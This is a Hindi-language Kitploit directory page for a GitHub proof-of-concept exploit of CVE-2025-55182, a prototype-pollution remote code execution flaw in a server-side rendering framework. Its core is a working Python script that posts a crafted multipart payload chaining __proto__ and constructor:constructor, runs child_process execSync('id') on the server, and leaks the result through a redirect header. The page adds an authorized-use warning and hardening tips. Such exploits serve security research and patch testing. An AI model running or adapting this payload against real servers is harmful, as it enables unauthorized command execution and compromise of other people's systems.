Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Proof-of-Concept — CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो सर्वर-साइड रेंडरिंग इम्प्लीमेंटेशन में प्रोटोटाइप प्रदूषण के माध्यम से रिमोट कोड एक्जीक्यूशन को प्रदर्शित करता है। इसमें पायथन एक्सप्लॉइट स्क्रिप्ट और सुरक्षा अनुशंसाएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/thekamran/cve-2025-55182-proof-of-concept
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubthekamran/cve-2025-55182-proof-of-concept

CVE-2025-55182-Proof-of-Concept

CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो सर्वर-साइड रेंडरिंग इम्प्लीमेंटेशन में प्रोटोटाइप प्रदूषण के माध्यम से रिमोट कोड एक्जीक्यूशन को प्रदर्शित करता है। इसमें पायथन एक्सप्लॉइट स्क्रिप्ट और सुरक्षा अनुशंसाएँ शामिल हैं।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 प्रूफ-ऑफ-कॉन्सेप्ट

इस रिपॉजिटरी में CVE-2025-55182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है, जो कि कुछ सर्वर-साइड रेंडरिंग कार्यान्वयनों में प्रोटोटाइप प्रदूषण (Prototype Pollution) के कारण रिमोट कोड एक्जीक्यूशन (RCE) से संबंधित एक कमजोरी है।

⚠️ चेतावनी: यह PoC केवल शैक्षिक, अनुसंधान और व्यक्तिगत या नियंत्रित वातावरणों पर अधिकृत सुरक्षा परीक्षण के लिए है। बिना अनुमति के सिस्टम पर अनधिकृत उपयोग अवैध है।


कमजोरी का अवलोकन

यह कमजोरी तब उत्पन्न होती है जब अमान्यकृत उपयोगकर्ता इनपुट आंतरिक जावास्क्रिप्ट ऑब्जेक्ट संरचनाओं (प्रोटोटाइप प्रदूषण) में इंजेक्ट किया जाता है। जब इसे विशिष्ट निष्पादन प्रवाहों के साथ जोड़ा जाता है, तो यह मनमाना कोड निष्पादन का कारण बन सकता है।

इस PoC में, __proto__ और constructor जैसी श्रृंखलाबद्ध गुणों का उपयोग प्रदूषण को निष्पादन संदर्भ में बढ़ाने के लिए किया जाता है।


प्रूफ-ऑफ-कॉन्सेप्ट

नीचे exploit.py दिया गया है जो दर्शाता है कि कमजोरी का शोषण कैसे किया जा सकता है:

import requests
import json

url = "http://localhost:3000"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
}

prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"

files = {
    "0": (
        None,
        json.dumps({
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then":"$B1337"}',
            "_response": {
                "_prefix": prefix,
                "_formData": {"get": "$1:constructor:constructor"}
            }
        }),
        "application/json",
    ),
    "1": (None, "\"$@0\""),
}

response = requests.post(url, headers=headers, files=files)

print("Headers:", response.headers.get('x-action-redirect'))

चलाने का तरीका

python3 exploit.py

सुनिश्चित करें कि आप इसे केवल स्थानीय या डेवलपमेंट वातावरण में चलाएँ।


पैच स्थिति

यदि यह कमजोरी किसी वास्तविक-दुनिया के प्रोजेक्ट को प्रभावित करती है, तो मेंटेनर्स द्वारा जारी नवीनतम सुरक्षा पैच की जाँच करें और उन्हें स्थापित करें।


सुरक्षा अनुशंसाएँ

  • नियमित रूप से npm audit चलाएँ और निर्भरताओं को सुरक्षित रखने के लिए npm audit fix लागू करें
  • सभी उपयोगकर्ता इनपुट को मान्य और स्वच्छ करें
  • आंतरिक जावास्क्रिप्ट ऑब्जेक्ट प्रोटोटाइप तक पहुँच को रोकें
  • जहाँ संभव हो SSR सैंडबॉक्स आइसोलेशन का उपयोग करें
  • उत्पादन में child_process निष्पादन को प्रतिबंधित या अक्षम करें

लाइसेंस

MIT लाइसेंस

टूल डाउनलोड करें